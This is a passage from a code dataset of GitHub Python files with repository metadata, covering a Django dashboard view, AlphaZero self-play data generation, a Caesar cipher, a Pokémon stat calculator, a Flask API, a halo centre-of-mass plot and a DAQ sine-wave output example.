UserData.objects.filter(user=request.user).order_by('-uploaded_at')\n\n user_data = []\n for upload in uploads:\n date = upload.uploaded_at.strftime('%Y-%m-%d %H:%M:%S')\n user_data.append({\"score\": upload.score, \"id\": upload.id, \"uploaded_at\": date})\n\n else:\n user_data = {}\n\n # Number of users:\n # ----------------------------------------------------\n n_users = Profile.objects.all().count()\n\n # Average number of frames per user\n # ----------------------------------------------------\n avg_user_score = 
Profile.objects.aggregate(Avg('score'))['score__avg']\n    avg_user_score = round(avg_user_score) if avg_user_score is not None else 0\n\n    # Average number of sessions per user\n    # ----------------------------------------------------\n    avg_session_score = UserData.objects.aggregate(Avg('score'))['score__avg']\n    avg_session_score = round(avg_session_score) if avg_session_score is not None else 0\n\n    avg_session_time = round(avg_session_score / 60, 2) if avg_session_score is not None else 0\n\n    # Top 3 users\n    # ----------------------------------------------------\n    top_3_score_sum = Profile.objects.order_by('-score')[:3].aggregate(Sum('score'))['score__sum']\n    if top_3_score_sum is not None and score_sum > 0:\n        top_3_score_percent = round(100 * top_3_score_sum / score_sum, 2)\n    else:\n        top_3_score_percent = 0\n\n    # Longest fishing session\n    # ----------------------------------------------------\n    max_score = UserData.objects.aggregate(Max('score'))['score__max']\n    max_score_users = UserData.objects.filter(score=max_score)\n\n    if max_score_users is not None and max_score is not None:\n        rand_user = random.randint(0, len(max_score_users) - 1)\n\n        max_score_user = [user for user in max_score_users][rand_user]\n        time = round(max_score / 60, 1)\n    else:\n        max_score = 0\n        max_score_user = 'admin'\n        time = 0\n\n    longest_session_dict = {'max_score': max_score, 'user': max_score_user, 'time': time}\n\n    return render(request, 'Data/dashboard.html', context={\n\n        'bffs_dict': bffs,\n        'data': json.dumps(data),\n        'score_sum': score_sum,\n        'total_time_played': total_time_played,\n        'user_data': user_data,\n        'help_percent': help_percent,\n        'n_users': n_users,\n        'avg_user_score': avg_user_score,\n        'avg_session_score': avg_session_score,\n        'avg_session_time': avg_session_time,\n        'top_3_score_percent': top_3_score_percent,\n        'longest_session': longest_session_dict,\n        'token': token\n    })\n","repo_name":"Setti7/Stardew-Web","sub_path":"Data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"15062741986","text":"import requests\n\n\n\nurl = \"https://httpbin.org/get\"\n\nargs = {\n    \"nombre\":\"Juan\",\n    \"curso\":\"python\",\n    \"nivel\":\"intermedio\"\n    }\n\nresponse = requests.get(url,params=args)\n\nprint(response.url)\n\nif response.status_code == 200:\n    print(response.content)","repo_name":"AlexOlivaresP/CifradorFLASK","sub_path":"ejemploe/uno.py","file_name":"uno.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"17478133330","text":"import numpy as np\n\ndef get_data(mcts, max_moves=150, nnet=True, prop_thresh=30, verbose=0, return_moves=True):\n    \"\"\"\n    Gets the data that can be used to train an agent (typically a neural net). Uses MCTS\n    to generate policies and rewards that are then returned.\n\n    Params\n    ------\n    \n    mcts: MCTS\n        The monte carlo tree search object to use.\n\n    max_moves: int, default=150\n        The maximum number of moves the game can make before considering the game a draw.\n\n    nnet: bool, default=True\n        Whether the data should be acceptable to a neural network.\n\n    prop_thresh: int, default=30\n        Proportionality threshold for the prop constant in the mcts policy. The threshold defines the move\n        after which the MCTS starts behaving greedily.\n\n    verbose: int, default=0\n        The verbosity of the state. 
Accepts 0 or 1 (verbose or not).\n\n    return_moves: bool, default=True\n        Whether to return the number of moves as well as the data.\n\n    Returns\n    -------\n\n    data: list\n        The encoded data, containing training examples in the form [(state, target_pi, target_value),...].\n\n    moves: int, optional\n        The number of moves played. Only returned if return_moves is True.\n    \"\"\"\n    memory = [] # place to store states as we play\n    possible_moves = mcts.action_space\n    game = mcts.game\n    board_state = game.state()\n\n    for move in range(max_moves):\n        # get the game state and current player for the nn\n        # TODO: allow for symmetric game\n        # states = game.get_symmetries(nnet)\n        state = game.state(nnet)\n        cur_play = game.current_player()\n\n        # use mcts to get a policy\n        prop = int(move < prop_thresh)\n        mcts.train()\n        policy = mcts.get_policy(prop=prop)\n\n        # choose an action based off this state\n        act = np.random.choice(possible_moves, p=policy)\n\n        # store the state, policy, and player\n        #for state in states:\n        #    memory.append([state, policy, cur_play])\n        memory.append([state, policy, cur_play])\n\n        # perform this action\n        s = game.state()\n        game.move(act)\n        mcts.update()\n        if verbose:\n            print(mcts.get_Qsa(s, act), mcts.get_Nsa(s, act), game.engine.result(), game.current_player())\n            print(game.board())\n        \n\n        # check if the game is over\n        v = game.winner()\n        if v != 0:\n            # game over state\n            # it's currently the move of the loser, so v=-1\n            # all states that have this player should have a v=-1\n            # all states that have the other player should have v=1\n            # so check the current player\n            cur_play = game.current_player()\n            # so if cur_play = sa.cur_play, return v=-1\n            # if cur_play != sa.cur_play, return v=1\n            data = [(x[0], x[1], v if x[2] == cur_play else -v) for x in memory]\n            # reset the game\n            game.set_state(board_state)\n            mcts.update()\n            if return_moves:\n                return data, move+1\n            return data\n    # max moves was reached\n    # here the outcome is a draw\n    if verbose:\n        print(\"Game ended in draw, max_moves was met\")\n    v = 0\n    data = [(x[0], x[1], v) for x in memory]\n    game.set_state(board_state)\n    mcts.update()\n    if return_moves:\n        return data, move+1\n    return data","repo_name":"jasonrobwebster/alphazero-clone","sub_path":"coach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"8047754542","text":"\"\"\"Caesar cipher.\"\"\"\n\n\ndef encode(message: str, shift: int):\n    \"\"\"Encode a message using a Caesar cipher.\"\"\"\n    new_message: str = \"\"\n    if shift > 26:  # If shift = 26 then it is the same letter\n        shift %= 26  # Skips useless laps (lap = 26) and finds useful shift\n    for element in message:  # Loop checks every letter per iteration\n        if ord(element) > 122 or 97 > ord(element):  # Elements that are not in a...z\n            new_message += element  # Leave item the same\n        else:\n            new_element = ord(element) + shift\n            if new_element > 122:\n                new_element = 96 + (new_element - 122)  # Searches for element in range from a...z\n                new_message += chr(new_element)  # Adds new element\n            else:\n                new_message += chr(new_element)\n    return new_message\n\n\nif __name__ == '__main__':\n    print(encode(\"i like turtles\", 6))  # -> o roqk zaxzrky\n    print(encode(\"o roqk zaxzrky\", 20))  # -> i like turtles\n    print(encode(\"example\", 1))  # -> fybnqmf\n    print(encode(\"don't change\", 0))  # -> don't change\n    print(encode('the quick brown fox jumps over the lazy dog.', 7))  # -> aol xbpjr iyvdu mve qbtwz vcly aol shgf 
kvn.\n","repo_name":"aKaidalov/iti0102-2022","sub_path":"EX/ex02_math/caesar.py","file_name":"caesar.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72500347953","text":"\"\"\"Module instantiating a slithering animal\"\"\"\nfrom datetime import date\n\nclass Hognose:\n \"\"\"Class representing an animal\"\"\"\n def __init__(self, name, species):\n # Establish the properties of each animal\n # with a default value\n self.name = name\n self.species = species\n self.date_added = date.today()\n self.slithering = True\nbaby_cakes = Hognose(\"Baby Cakes\", \"Southern Hognose snake\")\nprint(baby_cakes)\n","repo_name":"dontcallmeplath/petting-zoo","sub_path":"slithering/Hognose.py","file_name":"Hognose.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8268783834","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom fractions import Fraction\nfrom typing import Optional\n\nimport voluptuous as vlps\n\nfrom pkmn_stat_type import StatType, GenStatType\nfrom utils import enum_const_dict, multiplier_range_frac, IntRange, IntOrRange_T, FracRange, FracOrRange_T,\\\n\tFloatOrRange_T\nfrom nature import Nature\n\n\nLVL_RANGE = IntRange(1, 100)\n# Used in formulas\nLVL_NORM = 100\n\n\nclass BaseStats(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass IVRanges(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass EVs(enum_const_dict(StatType, int)):\n\tpass\n\n\nclass Stats(enum_const_dict(StatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStats(enum_const_dict(GenStatType, IntOrRange_T)):\n\tpass\n\n\nclass GenStatsNormalized(enum_const_dict(GenStatType, FloatOrRange_T)):\n\tpass\n\n\n@dataclass(slots=True)\nclass StatData:\n\tvalue: int = None\n\tiv: Optional[IntOrRange_T] = None\n\tev: Optional[IntOrRange_T] = None\n\n\t@classmethod\n\tdef bare_val(cls, value: int = None) -> StatData:\n\t\treturn cls(value=value, ev=0)\n\n\nclass StatsData(enum_const_dict(StatType, StatData)):\n\t...\n\n\n# Structure like:\n# {\n# StatType.HP: 100, # `value` argument\n# StatType.ATK: {\"value\": 70, \"ev\": 252},\n# StatType.DEF: {\"value\": 90, \"ev\": None, \"iv\": IntRange(4, 7)},\n# ...\n# }\nInputStatsData_T = dict[\n\tStatType,\n\tIntOrRange_T | None | dict[\n\t\tstr,\n\t\tIntOrRange_T | None\n\t]\n]\n\n\nNatureMult_T = int | Fraction\n\n\nclass Stat:\n\tBASE_RANGE = IntRange(0, 256)\n\tIV_RANGE = IntRange(0, 31)\n\tEV_RANGE = IntRange(0, 252)\n\n\tDEFAULT_MULT = 1\n\tINCREASED_MULT = Fraction(11, 10)\n\tDECREASED_MULT = Fraction(9, 10)\n\tMULT_RANGE = FracRange(DECREASED_MULT, INCREASED_MULT)\n\tPOSSIBLE_MULTS = DEFAULT_MULT, INCREASED_MULT, DECREASED_MULT\n\n\t@classmethod\n\tdef get_mult(cls, stat_type: StatType, nature: Nature):\n\t\tif stat_type == StatType.HP:\n\t\t\treturn None\n\t\telif nature.is_simple():\n\t\t\treturn cls.DEFAULT_MULT\n\t\telif stat_type == nature.increased:\n\t\t\treturn cls.INCREASED_MULT\n\t\telif stat_type == nature.decreased:\n\t\t\treturn cls.DECREASED_MULT\n\t\telse:\n\t\t\treturn cls.DEFAULT_MULT\n\n\tdef __init__(\n\t\tself,\n\t\ttype_: StatType,\n\t\tbase: int,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: int = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t):\n\t\tself._type = vlps.Schema(StatType)(type_)\n\t\tself._base = vlps.Schema(vlps.All(int, 
self.BASE_RANGE.in_validator))(base)\n\t\tself._lvl = vlps.Schema(vlps.Maybe(vlps.All(int, LVL_RANGE.in_validator)))(lvl)\n\t\tself._iv = vlps.Schema(vlps.Maybe(\n\t\t\tvlps.All(\n\t\t\t\tvlps.Any(IntRange, vlps.All(int, vlps.Coerce(IntRange))),\n\t\t\t\tself.IV_RANGE.in_validator,\n\t\t\t\tIntRange.is_straight_validator\n\t\t\t)\n\t\t))(iv)\n\t\tself._ev = vlps.Schema(vlps.Maybe(vlps.All(int, self.EV_RANGE.in_validator)))(ev)\n\n\t\tif type_ == StatType.HP:\n\t\t\t# For HP multiplier always is None (not used), but for protection\n\t\t\t# against gross typos:\n\t\t\tif mult is not None and mult != self.DEFAULT_MULT:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\t\tself._mult = None\n\t\telif mult is None:\n\t\t\tself._mult = None\n\t\telse:\n\t\t\tself._mult = vlps.Schema(vlps.In(self.POSSIBLE_MULTS))(mult)\n\n\t\tif val is None:\n\t\t\tself._val = None\n\t\t\ttry:\n\t\t\t\tself._val = self.get_val()\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\telse:\n\t\t\ttry:\n\t\t\t\tself._val = vlps.Schema(vlps.All(int, self.calc_val(\n\t\t\t\t\tself._type,\n\t\t\t\t\tself._base,\n\t\t\t\t\tself._iv,\n\t\t\t\t\tself._ev,\n\t\t\t\t\tself._lvl,\n\t\t\t\t\tself._mult\n\t\t\t\t).in_validator))(val)\n\t\t\texcept vlps.Error as e:\n\t\t\t\traise ValueError(f\"{self._type} {e}\")\n\n\t@property\n\tdef type(self) -> StatType:\n\t\treturn self._type\n\n\t@property\n\tdef base(self) -> int:\n\t\treturn self._base\n\n\t@classmethod\n\tdef _calc_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T\n\t) -> IntOrRange_T:\n\t\treturn (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\n\t@classmethod\n\tdef _calc_non_hp_val(\n\t\tcls,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: FracOrRange_T\n\t) -> IntOrRange_T:\n\t\tval = (2*base + iv + ev//4) * lvl // LVL_NORM + 5\n\t\tif mult != cls.DEFAULT_MULT:\n\t\t\tval = val * mult.numerator // mult.denominator\n\n\t\treturn val\n\n\t@classmethod\n\tdef _calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T,\n\t\tiv: IntOrRange_T,\n\t\tev: IntOrRange_T,\n\t\tmult: Optional[FracOrRange_T] # None for HP.\n\t) -> IntOrRange_T:\n\t\tif type_ == StatType.HP:\n\t\t\treturn cls._calc_hp_val(base, lvl, iv, ev)\n\t\telse:\n\t\t\treturn cls._calc_non_hp_val(base, lvl, iv, ev, mult)\n\n\t@classmethod\n\tdef calc_val(\n\t\tcls,\n\t\ttype_: StatType,\n\t\tbase: IntOrRange_T,\n\t\tlvl: IntOrRange_T = None,\n\t\tiv: IntOrRange_T = None,\n\t\tev: IntOrRange_T = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\tif lvl is None:\n\t\t\tlvl = LVL_RANGE\n\n\t\tif iv is None:\n\t\t\tiv = cls.IV_RANGE\n\n\t\tif ev is None:\n\t\t\tev = cls.EV_RANGE\n\n\t\tif type_ == StatType.HP:\n\t\t\tif mult is not None:\n\t\t\t\traise ValueError(f\"{StatType.HP} can not have nature multiplier\")\n\t\telif mult is None:\n\t\t\tmult = cls.MULT_RANGE\n\n\t\treturn cls._calc_val(type_, base, lvl, iv, ev, mult)\n\n\tdef get_val(\n\t\tself,\n\t\tlvl: Optional[IntOrRange_T] = None,\n\t\tiv: Optional[IntOrRange_T] = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None\n\t) -> IntOrRange_T:\n\t\t\"\"\"Get stat value.\"\"\"\n\t\tif lvl is None:\n\t\t\tlvl = self._lvl\n\n\t\tif iv is None:\n\t\t\tiv = self._iv\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tmult = self._mult\n\n\t\treturn self.calc_val(self._type, self._base, lvl, iv, ev, 
mult)\n\n\tdef get_iv(\n\t\tself,\n\t\tlvl: int = None,\n\t\tval: int = None,\n\t\tev: Optional[IntOrRange_T] = None,\n\t\tmult: Optional[NatureMult_T] = None # None for self value\n\t) -> IntRange:\n\t\tif lvl is None:\n\t\t\tif self._lvl is None:\n\t\t\t\traise ValueError(\"Lvl must be specified\")\n\t\t\tlvl = self._lvl\n\n\t\tif val is None:\n\t\t\tif self._val is None:\n\t\t\t\traise ValueError(\"Stat value must be specified\")\n\t\t\tval = self._val\n\n\t\tif ev is None:\n\t\t\tev = self._ev\n\n\t\tif mult is None:\n\t\t\tif self._mult is None and self._type != StatType.HP:\n\t\t\t\traise ValueError(\"Nature multiplier must be specified\")\n\t\t\tmult = self._mult\n\n\t\t# HP = (2*base + iv + ev//4) * lvl // LVL_NORM + lvl + 10\n\t\t# NON_HP = ((2*base + iv + ev//4) * lvl // LVL_NORM + 5) * mult\n\n\t\tif self._type == StatType.HP:\n\t\t\trange_ = val - 10 - lvl\n\t\telif mult != self.DEFAULT_MULT:\n\t\t\trange_ = multiplier_range_frac(mult, val) - 5\n\t\telse:\n\t\t\trange_ = val - 5\n\n\t\trange_ = multiplier_range_frac(Fraction(lvl, LVL_NORM), range_)\n\t\trange_ -= 2*self._base + ev//4\n\t\ttry:\n\t\t\trange_.clamp(self.IV_RANGE)\n\t\texcept ValueError as e:\n\t\t\traise ValueError(f\"Calculated {self._type.name} IVs are impossible: {e}\") from e\n\n\t\treturn range_\n\n\ndef main():\n\tlvl = 78\n\n\t# stats = [\n\t# \tStat(StatType.HP, base=108, iv=24, lvl=lvl, ev=74),\n\t# \tStat(StatType.ATK, base=130, iv=12, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT),\n\t# \tStat(StatType.DEF, base=95, iv=30, lvl=lvl, ev=91),\n\t# \tStat(StatType.SPATK, base=80, iv=16, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT),\n\t# \tStat(StatType.SPDEF, base=85, iv=23, lvl=lvl, ev=84),\n\t# \tStat(StatType.SPEED, base=102, iv=5, lvl=lvl, ev=23)\n\t# ]\n\t# for stat in stats:\n\t# \tprint(f\"{stat._type.name}: {stat.get_val(lvl)}\")\n\n\tstats = [\n\t\tStat(StatType.HP, base=108, val=289, lvl=lvl, ev=74), # 24\n\t\tStat(StatType.ATK, base=130, val=278, lvl=lvl, ev=190, mult=Stat.INCREASED_MULT), # 12\n\t\tStat(StatType.DEF, base=95, val=193, lvl=lvl, ev=91), # 30\n\t\tStat(StatType.SPATK, base=80, val=135, lvl=lvl, ev=48, mult=Stat.DECREASED_MULT), # 16\n\t\tStat(StatType.SPDEF, base=85, val=171, lvl=lvl, ev=84), # 23\n\t\tStat(StatType.SPEED, base=102, val=171, lvl=lvl, ev=23) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tstats = [\n\t\tStat(StatType.HP, base=70, val=54, lvl=17), # 24\n\t\tStat(StatType.ATK, base=110, val=45, lvl=17), # 12\n\t\tStat(StatType.DEF, base=180, val=60, lvl=17, mult=Stat.DECREASED_MULT), # 30\n\t\tStat(StatType.SPATK, base=60, val=28, lvl=17), # 16\n\t\tStat(StatType.SPDEF, base=60, val=30, lvl=17, mult=Stat.INCREASED_MULT), # 23\n\t\tStat(StatType.SPEED, base=50, val=22, lvl=17) # 5\n\t]\n\n\tfor stat in stats:\n\t\tprint(f\"{stat.type.name}: {stat.get_iv()}\")\n\tprint()\n\n\tlvl = 50\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\tlvl = 100\n\tprint(Stat.calc_val(type_=StatType.HP, base=70, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.ATK, base=110, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.DEF, base=180, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPATK, base=60, 
lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPDEF, base=60, lvl=lvl))\n\tprint(Stat.calc_val(type_=StatType.SPEED, base=50, lvl=lvl))\n\tprint()\n\n\n\t# sd = StatsData({\n\t# \tStatType.HP: StatData(51),\n\t# \tStatType.ATK: StatData(17),\n\t# \tStatType.DEF: StatData(39),\n\t# \tStatType.SPATK: StatData(15),\n\t# \tStatType.SPDEF: StatData(18),\n\t# \tStatType.SPEED: StatData(51)\n\t# })\n\t# pretty_print(sd)\n\n\t# print(multiplier_range_frac(Fraction(76, 100), 200))\n\t# print()\n\t# print(multiplier_range_frac(Fraction(13, 100), 51))\n\t#\n\t# sd = StatsData({\n\t# \tst: StatData()\n\t# \tfor st in StatType\n\t# })\n\t# pretty_print(sd)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"Avorthoren/pkmn_py","sub_path":"pkmn_stat.py","file_name":"pkmn_stat.py","file_ext":"py","file_size_in_byte":9533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4586284056","text":"from flask import Flask, render_template, jsonify\nimport json\nfrom crime import SeattlePDApi\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n    return render_template('index.html', title=\"Home\")\n\n\n@app.route('/api/raw')\n@app.route('/api/raw/<int:limit>')\ndef api_raw(limit=20):\n    path = r'C:\\dev\\jim\\seattle_crime\\exports\\raw_json_20181102.json'\n    with open(path, 'r') as _f:\n        data = json.load(_f)\n        _f.close()\n    \n    if limit:\n        data = data[:limit]\n    return jsonify(data)\n\n@app.route('/api/bydate')\ndef crime_by_date():\n    s = SeattlePDApi()\n    data = s.get_crimes_by_date()\n    return jsonify(data)","repo_name":"cryocaustik/PyApiToHtml","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"8059211252","text":"from load_modules import *\n\n#run_type = 1 # indiv script selection 0 = save only / 1 = show only / 2 = save and show\n\nCoM_trace = np.empty([1,4])# np.empty(4) # first 3 columns = coords, 4th = time/scale factor\n\ni = 0\nwhile True:\n\ttry:\n\t\tfname = get_snap_filename('../Output', i*10)\n\t\tR = np.asarray(get_snap_data(fname, 1, 'Coordinates'))\n#\t\tprint(fname)\n\t\tn = get_attribute(fname,'NumPart_ThisFile')[1]\n\t\tM = np.full(n, 1)\n\t\tR_CoM = find_CoM(R, M)\n\t\ta = get_attribute(fname,'Time')\n\t\tstack = np.hstack((R_CoM,a))\n\t\tCoM_trace = np.append(CoM_trace, [stack], axis=0)\n#\t\tprint(CoM_trace[i])\n\texcept(KeyError, OSError, NameError, UnboundLocalError, IOError):\n\t\tbreak\n\telse:\n\t\ti += 1\n#print(CoM_trace)\n\n#projection in xy, xz, yz planes\n\nfig1 = plt.figure()\nax = fig1.add_subplot(projection='3d')\nax.scatter3D(CoM_trace[:,0], CoM_trace[:,1], CoM_trace[:,2])\nplt.title('Plot tracing halo CoM location through time [IC]')\nax.set_xlabel(r'$x\\; [kpc]$')\nax.set_ylabel(r'$y\\; [kpc]$')\nax.set_zlabel(r'$z\\; [kpc]$')\n\n\n#### BULK RUN OPTIONS ####\n\nif run_type == 0 or run_type == 2:\n\tfig1.savefig('./IC_halo_plots/IC_halo_CoM_trace.pdf') \n\nif run_type == 1 or run_type == 2:\n\tplt.show()\n\n\n","repo_name":"UONGGuy/DynamicalFriction_on_SMBH_scripts","sub_path":"halo_scripts/halo_CoM_trace.py","file_name":"halo_CoM_trace.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74244491954","text":"import setuptools\nimport os\n\n# Open and read README.md\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\n# Open and read 
requirements.txt\nbaseDir = os.path.dirname(os.path.realpath(__file__))\nrequirements_path = baseDir + '/requirements.txt'\ninstall_requires = []\nif os.path.isfile(requirements_path):\n    with open(requirements_path, 'r') as f:\n        install_requires = f.read().splitlines()\n\nsetuptools.setup(\n    name=\"BeautifulSites4\",\n    version=\"1.1.1-alpha\",\n    author=\"HipyCas\",\n    author_email=\"hipycas+python@gmail.com\",\n    description=\"An implementation of BeautifulSoup4 for some popular webpages\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url=\"https://github.com/HipyCas/BeautifulSites\",\n    packages=setuptools.find_packages(),\n    install_requires=install_requires,\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n)\n","repo_name":"HipyCas/BeautifulSites","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"9797828346","text":"from __future__ import absolute_import, division, print_function\n\nimport math\n\nfrom builtins import * # @UnusedWildImport\nfrom tkinter import messagebox\n\nfrom mcculw import ul\nfrom mcculw.enums import Status, FunctionType, ScanOptions\nfrom examples.ui.uiexample import UIExample\nfrom examples.props.ao import AnalogOutputProps\nfrom mcculw.ul import ULError\nimport tkinter as tk\n\n\nclass ULAO04(UIExample):\n    def __init__(self, master=None):\n        super(ULAO04, self).__init__(master)\n\n        self.board_num = 0\n        self.ao_props = AnalogOutputProps(self.board_num)\n\n        self.create_widgets()\n\n    def start_scan(self):\n        # Build the data array\n        self.low_chan = self.get_low_channel_num()\n        self.high_chan = self.get_high_channel_num()\n        self.num_chans = self.high_chan - self.low_chan + 1\n\n        if self.low_chan > self.high_chan:\n            messagebox.showerror(\n                \"Error\",\n                \"Low Channel Number must be less than or equal to High \"\n                \"Channel Number\")\n            self.set_ui_idle_state()\n            return\n\n        points_per_channel = 1000\n        rate = 1000\n        num_points = self.num_chans * points_per_channel\n        scan_options = (ScanOptions.BACKGROUND |\n                        ScanOptions.CONTINUOUS | ScanOptions.SCALEDATA)\n        ao_range = self.ao_props.available_ranges[0]\n\n        self.memhandle = ul.scaled_win_buf_alloc(num_points)\n\n        # Check if the buffer was successfully allocated\n        if not self.memhandle:\n            messagebox.showerror(\"Error\", \"Failed to allocate memory\")\n            self.start_button[\"state\"] = tk.NORMAL\n            return\n\n        try:\n            data_array = self.memhandle_as_ctypes_array_scaled(\n                self.memhandle)\n            frequencies = self.add_example_data(\n                data_array, ao_range, self.num_chans, rate,\n                points_per_channel)\n\n            self.recreate_freq_frame()\n            self.display_signal_info(frequencies)\n\n            ul.a_out_scan(\n                self.board_num, self.low_chan, self.high_chan, num_points,\n                rate, ao_range, self.memhandle, scan_options)\n\n            # Start updating the displayed values\n            self.update_displayed_values()\n        except ULError as e:\n            self.show_ul_error(e)\n            self.set_ui_idle_state()\n            return\n\n    def display_signal_info(self, frequencies):\n        for channel_num in range(self.low_chan, self.high_chan + 1):\n            curr_row = channel_num - self.low_chan\n            self.freq_labels[curr_row][\"text\"] = str(\n                frequencies[curr_row]) + \" Hz\"\n\n    def add_example_data(self, data_array, ao_range, num_chans,\n                         rate, points_per_channel):\n        # Calculate frequencies that will work well with the size of the array\n        
frequencies = []\n for channel_num in range(0, num_chans):\n frequencies.append(\n (channel_num + 1) / (points_per_channel / rate))\n\n # Calculate an amplitude and y-offset for the signal\n # to fill the analog output range\n amplitude = (ao_range.range_max - ao_range.range_min) / 2\n y_offset = (amplitude + ao_range.range_min) / 2\n\n # Fill the array with sine wave data at the calculated frequencies.\n # Note that since we are using the SCALEDATA option, the values\n # added to data_array are the actual voltage values that the device\n # will output\n data_index = 0\n for point_num in range(0, points_per_channel):\n for channel_num in range(0, num_chans):\n freq = frequencies[channel_num]\n value = amplitude * math.sin(\n 2 * math.pi * freq * point_num / rate) + y_offset\n data_array[data_index] = value\n data_index += 1\n\n return frequencies\n\n def update_displayed_values(self):\n # Get the status from the device\n status, curr_count, curr_index = ul.get_status(\n self.board_num, FunctionType.AOFUNCTION)\n\n # Display the status info\n self.update_status_labels(status, curr_count, curr_index)\n\n # Call this method again until the stop button is pressed\n if status == Status.RUNNING:\n self.after(100, self.update_displayed_values)\n else:\n # Free the allocated memory\n ul.win_buf_free(self.memhandle)\n self.set_ui_idle_state()\n\n def update_status_labels(self, status, curr_count, curr_index):\n if status == Status.IDLE:\n self.status_label[\"text\"] = \"Idle\"\n else:\n self.status_label[\"text\"] = \"Running\"\n\n self.index_label[\"text\"] = str(curr_index)\n self.count_label[\"text\"] = str(curr_count)\n\n def recreate_freq_frame(self):\n low_chan = self.low_chan\n high_chan = self.high_chan\n\n new_freq_frame = tk.Frame(self.freq_inner_frame)\n\n curr_row = 0\n self.freq_labels = []\n for chan_num in range(low_chan, high_chan + 1):\n curr_row += 1\n channel_label = tk.Label(new_freq_frame)\n channel_label[\"text\"] = (\n \"Channel \" + str(chan_num) + \" Frequency:\")\n channel_label.grid(row=curr_row, column=0, sticky=tk.W)\n\n freq_label = tk.Label(new_freq_frame)\n freq_label.grid(row=curr_row, column=1, sticky=tk.W)\n self.freq_labels.append(freq_label)\n\n self.freq_frame.destroy()\n self.freq_frame = new_freq_frame\n self.freq_frame.grid()\n\n def stop(self):\n ul.stop_background(self.board_num, FunctionType.AOFUNCTION)\n\n def exit(self):\n self.stop()\n self.master.destroy()\n\n def set_ui_idle_state(self):\n self.high_channel_entry[\"state\"] = tk.NORMAL\n self.low_channel_entry[\"state\"] = tk.NORMAL\n self.start_button[\"command\"] = self.start\n self.start_button[\"text\"] = \"Start\"\n\n def start(self):\n self.high_channel_entry[\"state\"] = tk.DISABLED\n self.low_channel_entry[\"state\"] = tk.DISABLED\n self.start_button[\"command\"] = self.stop\n self.start_button[\"text\"] = \"Stop\"\n self.start_scan()\n\n def get_low_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.low_channel_entry.get())\n except ValueError:\n return 0\n\n def get_high_channel_num(self):\n if self.ao_props.num_chans == 1:\n return 0\n try:\n return int(self.high_channel_entry.get())\n except ValueError:\n return 0\n\n def validate_channel_entry(self, p):\n if p == '':\n return True\n try:\n value = int(p)\n if(value < 0 or value > self.ao_props.num_chans - 1):\n return False\n except ValueError:\n return False\n\n return True\n\n def create_widgets(self):\n '''Create the tkinter UI'''\n example_supported = (\n self.ao_props.num_chans > 0\n and 
